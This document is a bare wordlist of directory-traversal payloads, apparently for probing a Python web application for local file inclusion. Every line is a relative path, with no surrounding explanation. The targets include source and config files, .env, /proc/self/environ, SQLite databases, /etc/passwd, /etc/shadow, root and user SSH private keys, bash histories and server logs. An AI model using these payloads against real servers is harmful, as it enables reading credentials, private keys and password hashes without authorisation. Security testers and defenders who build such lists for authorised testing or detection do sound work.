../../app.py
../../main.py
../../run.py
../../wsgi.py
../../server.py
../../config.py
../../settings.py
../../instance/config.py
../../instance/app.py
../../requirements.txt
../../.env
../../../../proc/self/environ
../../../../proc/self/cmdline
../../../../proc/self/status
../../../../proc/self/cwd
../../../../proc/self/fd/0
../../../../proc/self/fd/1
../../../../proc/self/fd/2
../../database.db
../../app.db
../../site.db
../../instance/app.db
../../instance/database.db
../../../../var/www/app.db
../../../../var/www/html/app.db
../../../../home/ubuntu/app.db
../../../../etc/passwd
../../../../etc/shadow
../../../../etc/hosts
../../../../etc/hostname
../../../../etc/os-release
../../../../etc/crontab
../../../../etc/issue
../../../../home/ubuntu/.bash_history
../../../../home/ubuntu/.ssh/id_rsa
../../../../home/ubuntu/.profile
../../../../root/.bash_history
../../../../root/.ssh/id_rsa
../../../../var/www/html/
../../../../var/www/
../../../../srv/
../../../../opt/
../../../../var/log/syslog
../../../../var/log/auth.log
../../../../var/log/apache2/access.log
../../../../var/log/nginx/access.log
../../../../venv/
../../../../env/
../../../../.venv/
../../../../.dockerenv
../../../../proc/1/cgroup
../../app.py
../../../../proc/self/environ

